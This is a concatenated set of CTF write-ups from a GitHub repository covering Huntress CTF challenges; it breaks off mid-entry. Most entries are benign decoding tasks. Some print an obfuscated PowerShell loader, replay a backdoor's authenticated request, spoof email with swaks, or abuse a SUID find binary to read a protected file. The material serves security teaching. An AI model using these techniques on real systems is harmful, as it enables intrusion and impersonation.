![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/c5d468ad-3642-4fd0-a43d-d737a2e7d422) 9 | 10 | flag{2dd41e3da37ef1238954d8e7f3217cd8} 11 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Query_Code.md: -------------------------------------------------------------------------------- 1 | # Query Code 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/212398a3-8168-4411-876b-68042c729f49) 5 | 6 | ### Solution 7 | After we download the file, we can find out it is actually a PNG: 8 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/0ded0ea7-c6da-4a66-9511-d76f8cc68076) 9 | 10 | We rename the file to give it the .png extension and open it: 11 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1b97e82c-e1de-449a-a76f-77c53805a782) 12 | 13 | Now that we know this is a QR Code, we can use `zbarimg` to scan it and print out the text in it: 14 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/e11f0248-6f94-4290-8e4f-9fb1ec46b8d9) 15 | 16 | flag{3434cf5dc6a865657ea1ec1cb675ce3b} 17 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Read_The_Rules.md: -------------------------------------------------------------------------------- 1 | # Read the Rules 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/aedaaa9c-cea5-4a8c-9b5a-de65392be143) 5 | 6 | ### Solution 7 | As usual we can find this flag in the Source Code of the rules page: 8 | https://huntress.ctf.games/rules 9 | 10 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4154ac87-fcd5-4006-a206-6e0093d7f29b) 11 | 12 | flag{90bc54705794a62015369fd8e86e557b} 13 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/String_Cheese.md: -------------------------------------------------------------------------------- 1 | # String Cheese 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/1719c38e-bf20-4245-8410-6b677b1ee799) 5 | 6 | ### Solution 7 | This is a very important thing to remember: Always use string + grep in CTFs, always! 8 | As the name implies, use `string`: 9 | 10 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/4a7a5085-cbfa-4411-a1d3-ce1016537fc7) 11 | 12 | 13 | flag{f4d9f0f70bf353f2ca23d81dcf7c9099} 14 | -------------------------------------------------------------------------------- /Huntress-CTF-2023/Warmups/Technical_Support.md: -------------------------------------------------------------------------------- 1 | # Technical Support 2 | 3 | ### Challenge Description 4 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/8e90b58d-5c80-4d22-8f74-94dc6fd36c23) 5 | 6 | ### Solution 7 | After we join the Discord, we can find the flag in the `ctf-open-ticket` channel. 8 | 9 | ![image](https://github.com/LazyTitan33/CTF-Writeups/assets/80063008/55db9ad9-96f8-45fb-8407-98cf71864c08) 10 | 11 | flag{a98373a74abb8c5ebb8f5192e034a91c} 12 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Crypto/No_need_for_Brutus.md: -------------------------------------------------------------------------------- 1 | # No need for Brutus 2 | 3 | ![image](https://github.com/user-attachments/assets/282ccb11-f7bd-4ea4-b882-f80bfad01710) 4 | 5 | ## My Solution 6 | 7 | The title is a clear reference to Caesar and the Caesar Cipher also known as ROT13. However, in this case, using [cyberchef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,10)&input=c3F1aXFoeWlpeWNmYnVkZWR1dXR2ZWhyaGtqa2k) we just need to rotate 10 times to find a readable string: 8 | 9 | ![image](https://github.com/user-attachments/assets/6fe3f1fe-8665-4a9d-b211-e1cae59b59b8) 10 | 11 | And then MD5 sum it using [cyberchef](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,10)MD5()&input=c3F1aXFoeWlpeWNmYnVkZWR1dXR2ZWhyaGtqa2k) since we are already in it, to get the correct hash for the flag: 12 | 13 | ![image](https://github.com/user-attachments/assets/89e713f8-4748-42d5-bb32-3ed718b30ef8) 14 | 15 | flag{c945bb2173e7da5a292527bbbc825d3f} 16 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Forensics/Ancient_Fossil.md: -------------------------------------------------------------------------------- 1 | # Ancient Fossil 2 | 3 | ![image](https://github.com/user-attachments/assets/3255f8ce-5291-4651-abdb-3d3625ff1c01) 4 | 5 | Download: [ancient.fossil](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/ancient.fossil) 6 | 7 | ## My Solution 8 | 9 | This file looks to be a Sqlite3 database based on the header. There were a few different things in it like this rebuild hash for for instance: 10 | 11 | ![image](https://github.com/user-attachments/assets/409bfeca-5f3c-467d-98df-3a68fda331d4) 12 | 13 | I didn't know what that is so I googled it: 14 | 15 | ![image](https://github.com/user-attachments/assets/1e9d919c-fc00-47a1-aeb0-03e762e71376) 16 | 17 | It seems that this is part of something called [fossil-scm](https://fossil-scm.org/home/uv/download.html). There are a few things this tool can do, including seeing a .fossil file as a git repo and allowing us to export it: 18 | 19 | ```bash 20 | ./fossil export --git ancient.fossil|grep flag 21 | ``` 22 | 23 | I did so while grepping for the flag and found it. 24 | 25 | `flag{2ed33f365669ea9f10b1a4ea4566fe8c}` 26 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Forensics/Backdoored_Splunk_II.md: -------------------------------------------------------------------------------- 1 | # Backdoored Splunk II 2 | 3 | ![image](https://github.com/user-attachments/assets/9e700c40-b597-40a9-8196-809fd7f894bf) 4 | 5 | Download: [Splunk_TA_windows.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/Splunk_TA_windows.zip) 6 | 7 | ## My Solution 8 | 9 | This is very similar with the [Backdoored Splunk](https://github.com/LazyTitan33/CTF-Writeups/blob/main/Huntress-CTF-2023/Forensics/Backdoored_Splunk.md) challenge from last year. This time if we find something suspicious in the `dns-health.ps1` file: 10 | 11 | ![image](https://github.com/user-attachments/assets/52f5eb82-1d80-4727-b125-c74fe7ca5105) 12 | 13 | We see a bunch of bytes being joined together and then passed to IEX. I changed that to pass it to echo instead and reveal a base64 blob: 14 | 15 | ![image](https://github.com/user-attachments/assets/148147f3-4f30-4853-9f04-f42763219b04) 16 | 17 | When decoding that further, we can see it doing an Invoke-WebRequest with a specific Authorization Basic header and some base64 encoded credentials. We just need to do the same request and replace the port with the one given by the challenge and we get our flag: 18 | 19 | ```bash 20 | curl -s -u backdoor:this_is_the_http_server_secret http://challenge.ctf.games:32557|awk '{print $2}'|base64 -d|awk '{print $2}' 21 | ``` 22 | 23 | ![image](https://github.com/user-attachments/assets/961a2607-de9c-4a49-a4de-a32d81b844dd) 24 | 25 | `flag{e15a6c0168ee4de7381f502439014032}` 26 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Forensics/Hidden_Streams.md: -------------------------------------------------------------------------------- 1 | # Hidden Streams 2 | 3 | 4 | ![image](https://github.com/user-attachments/assets/cd2f27da-cee4-4c96-acef-0af076b411a2) 5 | 6 | Download: [Challenge.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/challenge-hidden-streams.zip) 7 | 8 | ## My Solution 9 | 10 | I'm sure that there are better ways to do this challenge however, what I usually do is I convert the `.evtx` files to something that is human readable. For this purpose I used the [EvtxECmd.exe](https://github.com/EricZimmerman/evtx) tool to convert the files to `.csv`. 11 | 12 | ```bash 13 | .\EvtxECmd.exe -f C:\windows\tasks\Sysmon.evtx --csv c:\windows\tasks --csvf system.csv 14 | ``` 15 | 16 | I looked for powershell commands to see if any were used: 17 | 18 | ![image](https://github.com/user-attachments/assets/333b500d-1fc4-4a00-aaec-e485b2bf4395) 19 | 20 | We can see a base64 string in a result so we just decode it and get the flag. 21 | 22 | ```bash 23 | echo 'ZmxhZ3tiZmVmYjg5MTE4MzAzMmY0NGZhOTNkMGM3YmQ0MGRhOX0='|base64 -d 24 | ``` 25 | 26 | `flag{bfefb891183032f44fa93d0c7bd40da9}` 27 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Forensics/Keyboard_Junkie.md: -------------------------------------------------------------------------------- 1 | # Keyboard Junkie 2 | 3 | ![image](https://github.com/user-attachments/assets/8c4ea730-f8d5-41a0-8c18-49cb4ec7714b) 4 | 5 | Download: [keyboard_junkie](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/keyboard_junkie) 6 | 7 | 8 | ## My Solution 9 | 10 | When opening the provided file in Wireshark, I could see USB traffic. I've done these kinds of challenges in the past but couldn't remember the tool so I googled it: 11 | 12 | ![image](https://github.com/user-attachments/assets/521d0942-96a6-4332-acbf-17d9b2961d19) 13 | 14 | Using [this](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) tool allows us to decode keyboard traffic, but first we need to extract the traffic: 15 | 16 | ```bash 17 | tshark -r keyboard_junkie -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' >usbPcapData 18 | ``` 19 | 20 | Here we are using tshark to extract just the USB packets that have a length of 8 and are placing : every two characters to get a format recognized by the tool. 21 | 22 | We then use the [ctf-usb-keyboard-parser](https://github.com/TeamRocketIst/ctf-usb-keyboard-parser) and get the flag: 23 | 24 | ![image](https://github.com/user-attachments/assets/8977cec2-d6bb-4086-9ce2-fa84ceacb994) 25 | 26 | Another easier method would be to use this other [parser](https://github.com/5h4rrK/CTF-Usb_Keyboard_Parser) which allows us to pass the wireshark capture directly and it will grab the traffic on its own: 27 | 28 | ![image](https://github.com/user-attachments/assets/6b123389-47ea-4ecf-9208-06c962c23bcd) 29 | 30 | `flag{f7733e0093b7d281dd0a30fcf34a9634}` 31 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Forensics/Zimmer_down.md: -------------------------------------------------------------------------------- 1 | # Zimmer down 2 | 3 | ![image](https://github.com/user-attachments/assets/e4c69cf7-37ad-4e59-a5e1-24e850d9caea) 4 | 5 | Download: [NTUSER.DAT](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/NTUSER.DAT) 6 | 7 | ## My Solution 8 | 9 | I have parsed NTUSER.dat files before but also a good hint from John when announcing the challenges leads us to use the kali builtin tool called [regripper](https://www.kali.org/tools/regripper/): 10 | 11 | ![image](https://github.com/user-attachments/assets/2debf0ae-0b9b-4b97-bf7a-ccf26c0c45ee) 12 | 13 | 14 | ```bash 15 | regripper -r NTUSER.DAT -a 16 | ``` 17 | 18 | We can see a lot of data: 19 | 20 | ![image](https://github.com/user-attachments/assets/44e899f8-c66f-47ed-ae92-77078841e66e) 21 | 22 | But somewhere further down, this string drew my attention as it looked like it was a Base64 string. 23 | 24 | ![image](https://github.com/user-attachments/assets/21a0f165-40b6-4cab-88e0-d69cad1e6176) 25 | 26 | But not quite, the b62 at the end is another clue that this is actually a Base62 encoded string which we can decode using [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base62('0-9A-Za-z')&input=VkpHU3VFUmdDb1ZobDZtSmcxeDg3ZmFGT1BJcWFjSTNFYnk0b1A1TXlCWUtReTVwYURG) and get the flag: 27 | 28 | ![image](https://github.com/user-attachments/assets/693afddf-e9d1-42a9-9818-e79640ec96c7) 29 | 30 | `flag{4b676ccc1070be66b1a15dB601c8d500}` 31 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Malware/Obfuscation_Station.md: -------------------------------------------------------------------------------- 1 | # Obfuscation Station 2 | 3 | ![image](https://github.com/user-attachments/assets/c75d2f3d-dde4-44b5-9c74-0dca1cc5c20a) 4 | 5 | Download: [Challenge.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/Challenge.zip) 6 | 7 | 8 | ## My Solution 9 | 10 | We have some powershell syntax within the zip archive: 11 | 12 | ![image](https://github.com/user-attachments/assets/b0a9500c-780c-415b-b4c1-d8ee64a74894) 13 | 14 | The end part is just the script being piped to IEX so we want to avoid that. I replaced it with an echo so it simply unravels itself: 15 | 16 | ```powershell 17 | (nEW-objECt SYstem.iO.COMPreSsIon.deFlaTEStREAm( [IO.mEmORYstreAM][coNVERt]::FROMBAse64sTRING( ` 18 | 'UzF19/UJV7BVUErLSUyvNk5NMTM3TU0zMDYxNjSxNDcyNjexTDY2SUu0NDRITDWpVQIA'), ` 19 | [io.COmPREssioN.coMpreSSioNmODE]::DeCoMpReSS) | ` 20 | %{ nEW-objECt sYStEm.Io.StREAMrEADeR($_,[TeXT.encodiNG]::AsCii) } | ` 21 | %{ $_.READTOENd() }) | echo 22 | ``` 23 | 24 | ![image](https://github.com/user-attachments/assets/408713cb-a1dd-4f1a-a370-cf6cce5a48a5) 25 | 26 | Following the code logic, we can also do it in [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Raw_Inflate(0,0,'Adaptive',false,false)&input=VXpGMTkvVUpWN0JWVUVyTFNVeXZOazVOTVRNM1RVMHpNRFl4TmpTeE5EY3lOamV4VERZMlNVdTBORFJJVERXcFZRSUE&oeol=FF). 27 | 28 | `flag{3ed675ef0343149723749c34fa910ae4}` 29 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Malware/Ping_Me.md: -------------------------------------------------------------------------------- 1 | # Ping Me 2 | 3 | ![image](https://github.com/user-attachments/assets/daab6ee7-57da-48a0-9916-4583349d9414) 4 | 5 | Download: [ping_me.vbs](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/ping_me.vbs) 6 | 7 | ## My Solution 8 | 9 | We see that the provided .vbs file executes script: 10 | 11 | ![image](https://github.com/user-attachments/assets/9c372e27-9f98-47c9-93f3-438169616329) 12 | 13 | So I replaced the Execute with `WScript.Echo` to echo out the unravelled payload instead when we run it. 14 | 15 | ![image](https://github.com/user-attachments/assets/aed4114f-6d91-4954-8dd1-9186a8f86f4c) 16 | 17 | The next stage seems to be pinging some IPs. 18 | 19 | ![image](https://github.com/user-attachments/assets/d9387f9d-350f-411d-ba97-1635264c9104) 20 | 21 | However, if we separate the numbers in the IPs and decode them from decimal, we get our flag. We can again use [cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Decimal('Space',false)&input=MTAyIDEwOCA5NyAxMDMgMTIzIDU0IDEwMCA0OSA5OCA1NCA0OCA1MiA5OCA5OCA0OSA5OCA1NCAxMDAgOTcgNTEgNTAgOTggNTYgOTggOTggOTkgOTcgNTcgMTAxIDUwIDU0IDEwMCA1MyA0OSA1MyA1NiA1NyAxMjUgMzUgMzU&oeol=FF). 22 | 23 | `flag{6d1b604bb1b6da32b8bbca9e26d51589}##` 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Malware/Rustline.md: -------------------------------------------------------------------------------- 1 | # Rustline 2 | 3 | ![image](https://github.com/user-attachments/assets/9e82ace9-1bb1-4804-aa94-03bc7f82cb46) 4 | 5 | 6 | Download: [challenge.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/challenge-rustline.zip) 7 | 8 | ## My Solution 9 | 10 | Running strings on the provided file and looking for the word `huntress` we find another interesting domain: 11 | 12 | ![image](https://github.com/user-attachments/assets/d627767c-8c42-4cd9-bd0c-f3f403343a37) 13 | 14 | Just like in challenge `eepy`, I added the domain in my hosts file and ran the binary while listenting on port 80: 15 | 16 | ![image](https://github.com/user-attachments/assets/1ebfa755-eb35-48c8-b47f-2572e1c55f3e) 17 | 18 | When running the provided binary in [CommandoVM](https://github.com/mandiant/commando-vm) with [ProcMon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) running I saw that it read files only from the `challenge-files` folder: 19 | 20 | ![image](https://github.com/user-attachments/assets/81f0db72-b42c-4ccf-b92e-b4af898bd607) 21 | 22 | It was encrypting every file in this folder and sending it to this domain, but the encrypted content was always the same, so I added the encrypted flag.txt file into it and ran the binary. It seems that whatever encryption it was doing, probably XOR, it was reversible without me needing to do anything else. 23 | 24 | ![image](https://github.com/user-attachments/assets/e39648b2-a18b-4cf2-8f15-ac09797c342c) 25 | 26 | 27 | `flag{bfe12aadd139def4d47f5f51a539249d}` 28 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Malware/eepy.md: -------------------------------------------------------------------------------- 1 | # eepy 2 | 3 | ![image](https://github.com/user-attachments/assets/df766314-095a-42fd-b2da-29f9e649e59f) 4 | 5 | Download: [eepy.zip](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/eepy.zip) 6 | 7 | ## My Solution 8 | 9 | When running the provided binary in [CommandoVM](https://github.com/mandiant/commando-vm) with [ProcMon](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) running we can see it trying to make requests on a `supermegasus.huntress.local` domain via http, so port 80. 10 | 11 | ![image](https://github.com/user-attachments/assets/c78c7c92-d239-4bdb-9b2a-6a49fd37c384) 12 | 13 | So I stood up a netcat server on localhost port 80 after adding the domain in the hosts file and ran the binary again: 14 | 15 | ![image](https://github.com/user-attachments/assets/c83b0452-2da0-4b3f-8f08-6b02fda8b2cf) 16 | 17 | As we can see, it is making requests to me. While it was doing that, I created a process dump from Task Manager and ran strings on it greping for the flag and found it. Pretty cheesy. 18 | 19 | ![image](https://github.com/user-attachments/assets/8e80cf1e-978a-45ea-b69a-dd92e93698c3) 20 | 21 | `flag{2feb3ff8a21a36db1ad386d33a29d85a}` 22 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Misc/1200_Transmissions.md: -------------------------------------------------------------------------------- 1 | # 1200 Transmissions 2 | 3 | ![image](https://github.com/user-attachments/assets/98fb4df7-7ede-4a52-8c09-4c9398c4bd42) 4 | 5 | Download: [transmissions.wav](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/transmissions.wav) 6 | 7 | ## My Solution 8 | 9 | A quick google search for similar challenges yealds a promising [result](https://ctftime.org/writeup/23189): 10 | 11 | ![image](https://github.com/user-attachments/assets/5dd2f4e4-2946-4a3b-9452-ae7dd44b6af6) 12 | 13 | So we install and run the same tool: 14 | 15 | ```bash 16 | sudo apt install minimodem 17 | minimodem -r -f transmissions.wav 1200 18 | ``` 19 | 20 | And we get the flag: 21 | 22 | ![image](https://github.com/user-attachments/assets/7a7f3429-b0b3-4d89-b55a-c5b1655e4ec7) 23 | 24 | `flag{f28d133e7174c412c1e39b4a84158fa3}` 25 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Misc/Red_Phish_Blue_Phish.md: -------------------------------------------------------------------------------- 1 | # Red Phish Blue Phish 2 | 3 | ![image](https://github.com/user-attachments/assets/db9fa560-2d7e-4d90-a476-82b759285fb9) 4 | 5 | ## My Solution 6 | 7 | A quick google search of the company name reveals an actual website: 8 | 9 | ![image](https://github.com/user-attachments/assets/652bf541-ec6f-4e0d-a2a3-b5a8df8ec93e) 10 | 11 | In the [team](https://pyrchdata.com/team) section we can find multiple other employees: 12 | 13 | ![image](https://github.com/user-attachments/assets/814dafbb-ec2d-4bcd-88e7-e000dbc248c9) 14 | 15 | Since this is a phishing exercise, we know the email format and we know that the provided port is an SMTP server, we try sending emails from on behalf of swilliams to all the employees. Eventually when we get to the IT Manager, it seems he has an interesting automated message as a reply. 16 | 17 | ```bash 18 | swaks --to swilliams@pyrchdata.com --from jdaveren@pyrchdata.com --header "Subject: pentest" --body "give me the flag, pretty please" --server challenge.ctf.games --port 31594 19 | ``` 20 | 21 | ![image](https://github.com/user-attachments/assets/0633bcc9-e14c-4cfa-9c03-14adb177d523) 22 | 23 | `flag{54c6ec05ca19565754351b7fcf9c03b2}` 24 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Misc/Sekiro.md: -------------------------------------------------------------------------------- 1 | # Sekiro 2 | 3 | ![image](https://github.com/user-attachments/assets/af4d6bf9-b9fa-491e-9073-3098ab611d2b) 4 | 5 | 6 | ## My Solution 7 | 8 | Going through the service and experimenting with our inputs, we soon find that it's basically Rock Paper Scissors: 9 | 10 | We can script it to automate it and get the flag: 11 | 12 | ```python 13 | #!/usr/bin/python3 14 | 15 | from pwn import * 16 | context.log_level = "warn" 17 | 18 | p = remote('challenge.ctf.games', 32523) 19 | 20 | # retreat < strike 21 | # strike < block 22 | # block < advance 23 | # advance < retreat 24 | 25 | while True: 26 | try: 27 | p.recvuntil(b'Opponent move: ') 28 | action = p.recvline() 29 | if b'block' in action: 30 | p.recvuntil(b'Your move: ') 31 | p.sendline(b'advance') 32 | 33 | elif b'retreat' in action: 34 | p.recvuntil(b'Your move: ') 35 | p.sendline(b'strike') 36 | 37 | elif b'strike' in action: 38 | p.recvuntil(b'Your move: ') 39 | p.sendline(b'block') 40 | 41 | elif b'advance' in action: 42 | p.recvuntil(b'Your move: ') 43 | p.sendline(b'retreat') 44 | except: 45 | p.interactive() 46 | ``` 47 | 48 | ![image](https://github.com/user-attachments/assets/4f340daf-d57f-4dce-9233-b18ba37e4d1c) 49 | 50 | `flag{a1ae4e5604576818132ce3bfebe95de5}` 51 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/OSINT/Ran_somewhere.md: -------------------------------------------------------------------------------- 1 | # Ran somewhere 2 | 3 | ![image](https://github.com/user-attachments/assets/87dba907-d231-40ef-b6bc-6cf3991e108b) 4 | 5 | Download: [ran_somewhere.eml](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/ran_somewhere.eml) 6 | 7 | ## My Solution 8 | 9 | The provided `.eml` message file looks like this when opened in Outlook: 10 | 11 | ![image](https://github.com/user-attachments/assets/2b2661ae-adf2-4c1e-bd73-1f33d9c663ff) 12 | 13 | We see a mention of `fortified` which seems like a hint: 14 | 15 | ![image](https://github.com/user-attachments/assets/0ad28c95-5869-4e6d-9f7e-ae09d19027d6) 16 | 17 | The two .dat files are in fact pictures. The second one drew my attention as it had a bit more to work with in terms of interesting things to look at: 18 | 19 | ![image](https://github.com/user-attachments/assets/e7a956c0-9ac0-4ee5-9d33-25f86d6f267b) 20 | 21 | On the right side, we can see a partial sign with some text, zoomed in it looks like this: 22 | 23 | ![image](https://github.com/user-attachments/assets/87c4dce3-7585-4512-8821-e953ec86a4d6) 24 | 25 | Googling the part of the words that can be seen with the word fort (as indicated by the fortified from the email) and the word plaque, because that's what it is, we see the exact same plaque we have in the picture: 26 | 27 | ![image](https://github.com/user-attachments/assets/a4e96234-872d-45f5-badb-f5a6f76fbd79) 28 | 29 | The plaque itself contains the location: `Reckord Armory` 30 | 31 | Answer: `Reckord Armory` 32 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Others/Echo_Chamber.md: -------------------------------------------------------------------------------- 1 | # Echo Chamber 2 | 3 | ![image](https://github.com/user-attachments/assets/d1f75992-40e4-45f0-b120-92a115c2e051) 4 | 5 | Download: [echo_chamber.pcap](https://raw.githubusercontent.com/LazyTitan33/CTF-Writeups/refs/heads/main/Huntress-CTF-2024/challenge-files/echo_chamber.pcap) 6 | 7 | ## My Solution 8 | 9 | The provided pcap file contains ICMP traffic: 10 | 11 | ![image](https://github.com/user-attachments/assets/0269335e-3e96-499a-88ef-37adf1902174) 12 | 13 | Using tshark I exfiltrated only the requests (type 8): 14 | 15 | ```bash 16 | tshark -r echo_chamber.pcap -Y "icmp.type == 8" -T fields -e data 17 | ``` 18 | 19 | And saw repeating values: 20 | 21 | ![image](https://github.com/user-attachments/assets/60a2d7f6-b61f-4e38-ab0f-a71ac47987e6) 22 | 23 | So I decided to take just the first 2 characters which look like hex and decode them: 24 | 25 | ```bash 26 | tshark -r echo_chamber.pcap -Y "icmp.type == 8" -T fields -e data 2>/dev/null|sed 's/^\(.\{2\}\).*/\1/'|xxd -r -p 27 | ``` 28 | The result was a PNG file based on the header: 29 | 30 | ![image](https://github.com/user-attachments/assets/b60f61db-9e2c-4a6a-9e4f-a2e7aba1ecf2) 31 | 32 | And we have our flag: 33 | 34 | ![image](https://github.com/user-attachments/assets/cee6c2c9-22e3-4a3b-8555-dbb12bf6ff04) 35 | 36 | `flag{6b38aa917a754d8bf384dc73fde633ad}` 37 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/README.md: -------------------------------------------------------------------------------- 1 | This month long CTF from [Huntress](https://www.huntress.com/) was much tougher than last year's. There were many more RE challenges which required a much better knowledge of assembly, golang or rust than I have or care to develop. 2 | 3 | That being said, I did still get a slightly better position on the scoreboard than last year so I'm happy with that. Got 90th out of 3444 teams, which is top 2.6%. 4 | 5 | ![image](https://github.com/user-attachments/assets/7d8ecfca-56fb-47e9-9fdf-622a576b6a4e) 6 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Warmups/Finders_Fee.md: -------------------------------------------------------------------------------- 1 | # Finders Fee 2 | 3 | ![image](https://github.com/user-attachments/assets/6e38ed81-b5f2-4752-823e-4e703b47efee) 4 | 5 | ## My Solution 6 | 7 | We are dropped in a shell where the `find` command has SUID permissions and the flag is in the `finder` user home directory. Looking through the help section of the find command, we can see that using the `-files0-from` argument, it allows us to give it a file as an argument from which to read files. 8 | 9 | ![image](https://github.com/user-attachments/assets/2dfc11cf-283b-4cce-ac58-a4deba4a9620) 10 | 11 | However, similar to other binaries, when it is not finding the file you provide, it tells you with a verbose error message and as such you can leak information. 12 | 13 | ```bash 14 | find -files0-from /home/finder/flag.txt 15 | ``` 16 | 17 | ![image](https://github.com/user-attachments/assets/e9dc2dac-da8c-4a22-9477-e887252f5ab6) 18 | 19 | `flag{5da1de289823cfc200adf91d6536d914}` 20 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Warmups/Mystery.md: -------------------------------------------------------------------------------- 1 | # Mystery 2 | 3 | ![image](https://github.com/user-attachments/assets/b03b0809-03c4-412d-aa1c-65f832ad40b5) 4 | 5 | ## My Solution 6 | 7 | This one was puzzling at the beginning but I knew there is enough information in the description to figure out what it is encoded in but I couldn't quite put my finger on it, so I asked ChatGPT. 8 | 9 | ![image](https://github.com/user-attachments/assets/0f91c826-068a-4e25-b7d7-7886197c0344) 10 | 11 | It mentioned the Enigma machine and gave a python script to decode the message: 12 | 13 | ```bash 14 | pip3 install py-enigma 15 | ``` 16 | 17 | ```python3 18 | from enigma.machine import EnigmaMachine 19 | 20 | # Setup Enigma machine with your settings 21 | machine = EnigmaMachine.from_key_sheet( 22 | rotors='VI I III', 23 | reflector='B', 24 | ring_settings='1 1 1', # Ring settings in the key sheet start from 1 (A = 1) 25 | plugboard_settings='BQ CR DI EJ KW MT OS PX UZ GH' 26 | ) 27 | 28 | # Set the initial rotor positions 29 | machine.set_display('AQL') # Initial rotor positions A, Q, L 30 | 31 | # Ciphertext 32 | ciphertext = 'rkenr wozec gtrfl obbur bfgma fkgyq ctkvq zeucz hlvwx yyzat zbvns kgyyd sthmi vsifc ovexl zzdqv slyir nwqoj igxuu kdqgr fdbbd njppc mujyy wwcoy'.replace(' ', '') 33 | 34 | # Decrypt the message 35 | plaintext = machine.process_text(ciphertext) 36 | 37 | print('Decrypted Message:', plaintext) 38 | ``` 39 | 40 | ![image](https://github.com/user-attachments/assets/ecd65168-6a51-4b37-b481-8cc6778fbcce) 41 | 42 | `FLAGFDFEABCACBEBFBADAEFBECCAADDDBAFEZZZ` 43 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Warmups/TXT_Message.md: -------------------------------------------------------------------------------- 1 | # TXT Message 2 | 3 | ![image](https://github.com/user-attachments/assets/5f9a4596-6227-4fbe-8c10-9d1505664461) 4 | 5 | ## My Solution 6 | 7 | The title of the challenge immediately make me think of the DNS TXT record which I check using `dig`: 8 | 9 | ![image](https://github.com/user-attachments/assets/f9b08084-a7f6-4900-b816-66580a3c4bbb) 10 | 11 | We can see some numbers which look like octal: 12 | 13 | 14 | ```text 15 | 146 154 141 147 173 061 064 145 060 067 062 146 067 060 065 144 064 065 070 070 062 064 060 061 144 061 064 061 143 065 066 062 146 144 143 060 142 175 16 | ``` 17 | 18 | We confirm this by decoding it from octal using [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Octal('Space')&input=MTQ2IDE1NCAxNDEgMTQ3IDE3MyAwNjEgMDY0IDE0NSAwNjAgMDY3IDA2MiAxNDYgMDY3IDA2MCAwNjUgMTQ0IDA2NCAwNjUgMDcwIDA3MCAwNjIgMDY0IDA2MCAwNjEgMTQ0IDA2MSAwNjQgMDYxIDE0MyAwNjUgMDY2IDA2MiAxNDYgMTQ0IDE0MyAwNjAgMTQyIDE3NQ): 19 | 20 | ![image](https://github.com/user-attachments/assets/2e5fb2a0-8b56-4a7e-bbf9-07a6fcdbe7ca) 21 | 22 | `flag{14e072f705d45882401d141c562fdc0b}` 23 | -------------------------------------------------------------------------------- /Huntress-CTF-2024/Warmups/The_Void.md: -------------------------------------------------------------------------------- 1 | # The Void 2 | 3 | ![image](https://github.com/user-attachments/assets/4765d286-fb5d-4886-b1be-5e63199cbd3f) 4 | 5 | ## My Solution 6 | 7 | This was a weird one. When connecting to the port it provides it just starts printing out seemingly nothing/spaces in the terminal. 8 | 9 | However, if we redirect the output to a file and then read the file, very carefuly, we will see the flag letters hidden one by one after an ANSI escape code that is used to format text in the terminal, specifically the blank looking part. 10 | 11 | ![image](https://github.com/user-attachments/assets/9ff927d9-a9c9-449a-a136-db57ef0faf15) 12 | 13 | Here’s what each part means in [30;40m: 14 | 15 | 30: Sets the foreground text color to black. 16 | 40: Sets the background color to black. 17 | m: Marks the end of the sequence. 18 | 19 | For instance, running this command in the terminal would make it appear invisible: 20 | 21 